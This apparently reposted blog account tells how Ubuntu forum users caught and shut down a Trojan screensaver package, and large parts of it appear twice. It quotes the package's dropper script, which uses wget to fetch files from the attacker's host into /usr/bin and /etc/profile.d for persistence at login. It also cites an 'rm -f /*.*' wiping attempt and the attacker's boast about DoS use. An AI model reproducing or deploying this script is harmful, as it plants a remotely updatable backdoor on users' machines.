Twenty four hours ago an Ubuntu user downloaded a screen saver from an UNTRUSTED site.
It was a Trojan.
The lesson is clear. If you are a newbie DO NOT install files or packages from untrusted sites.
Here was his cry for help:
The sequence of events which followed are documented in this Ubuntu forum thread.
In 19 hours the Trojan was analyzed and traced back to the bad guy's site, which was shut down. During that analysis, bash commands to eliminate the files were worked out in the thread. When the discussion started wondering the thread was closed.
The OP was lucky. One command in the script apparently tried to run "rm -f /*.*", in an attempt to delete the contents of the hard drive, but the bad guy's syntax is defective. The bulk of the Trojan replaces a couple of GNOME files and puts a script into /etc/profile.d, which gets run every time the user logs in. That script does a wget on the hacker's site to download any upgrades to the Trojan's payload.
Then, they discovered him:
Here's his confession:
Within a few hours, by msg #29, the malware had been removed from Gnome-look.org.
To check their machines after the malware was cleaned off it was recommended that they run
ps -C wget
every few hours for a couple days, to see of a wget process is running that they didn't start.
Then, the following message was found on the bad guy's web site:
Within a few hours, by msg #95, both the screen saver and the bad guy's website had been taken down!
I can't let this go without mentioning that if you had been running Windows you would still be waiting for "Tuesday Update", IF Microsoft let you know about the exploit at all.
It was a Trojan.
The lesson is clear. If you are a newbie DO NOT install files or packages from untrusted sites.
Here was his cry for help:
Hello guys Im going to make this breef
I have installed a deb from a site claiming to be an Screensaver however it looked dodgy however I proceeded.
after I looked into the source I found MYSTERIOS ACTIVITY FOR WHAT SHOULD BE A SCREENSAVER... IS THIS REQUIRED? (below)
(also no screensaver was ever shown in gnome-screensaver)
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit
Im no expert but this looks just wrong!!
I have removed the package however I i doubt this has done much good...
Please help, comments exist from other users who have downloaded this file not understanding why their screensaver did not show up and probably left the file installed.
This all just litterally happened in the last few minutes and im affraid to reboot my computer.. should I reinstall my gnome packages?
Or was I just being paranoid? Im thinking I should contact the other users who have downloaded the file and request the file be pulled if it is in fact some attack...
Sorry for sounding strange, Just trying to fix this A.S.A.P.
Thank you for any suggestions.
I have installed a deb from a site claiming to be an Screensaver however it looked dodgy however I proceeded.
after I looked into the source I found MYSTERIOS ACTIVITY FOR WHAT SHOULD BE A SCREENSAVER... IS THIS REQUIRED? (below)
(also no screensaver was ever shown in gnome-screensaver)
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit
Im no expert but this looks just wrong!!
I have removed the package however I i doubt this has done much good...
Please help, comments exist from other users who have downloaded this file not understanding why their screensaver did not show up and probably left the file installed.
This all just litterally happened in the last few minutes and im affraid to reboot my computer.. should I reinstall my gnome packages?
Or was I just being paranoid? Im thinking I should contact the other users who have downloaded the file and request the file be pulled if it is in fact some attack...
Sorry for sounding strange, Just trying to fix this A.S.A.P.
Thank you for any suggestions.
In 19 hours the Trojan was analyzed and traced back to the bad guy's site, which was shut down. During that analysis, bash commands to eliminate the files were worked out in the thread. When the discussion started wondering the thread was closed.
The OP was lucky. One command in the script apparently tried to run "rm -f /*.*", in an attempt to delete the contents of the hard drive, but the bad guy's syntax is defective. The bulk of the Trojan replaces a couple of GNOME files and puts a script into /etc/profile.d, which gets run every time the user logs in. That script does a wget on the hacker's site to download any upgrades to the Trojan's payload.
Then, they discovered him:
http://www.mmowned.com/forums/wow-sc...hing-pack.html
Look here guys
Turns out it is a WoW fanboy... most important thing is to get the identity of this person and pull down the file
he refers to the link in here.. of http://05748.t35.com/ script thing
Look here guys
Turns out it is a WoW fanboy... most important thing is to get the identity of this person and pull down the file
he refers to the link in here.. of http://05748.t35.com/ script thing
The point is that I was dumb enough to think that Ubuntu was secure enough out here in the Linux wonderland that I love so much that I ended up on gnome-look downloading everything that looked cool without examining everything first.
To check their machines after the malware was cleaned off it was recommended that they run
ps -C wget
every few hours for a couple days, to see of a wget process is running that they didn't start.
Then, the following message was found on the bad guy's web site:
If your reading this from coming from that ubuntu forums place, Well done you saw right thourgh my "Screensaver" cough cough wink wink, I can tell you this. Basically after getting some scripts to run upon start up, It then sets to work downloading another file, This can be changed on my server so in essence i could do whatever i like on your computer, But i only really want to perfrom a DOS (denial of service) attack, For no reason I'm attacking mmowned.com, Just using it as a test. Hats Off!
I can't let this go without mentioning that if you had been running Windows you would still be waiting for "Tuesday Update", IF Microsoft let you know about the exploit at all.
Comment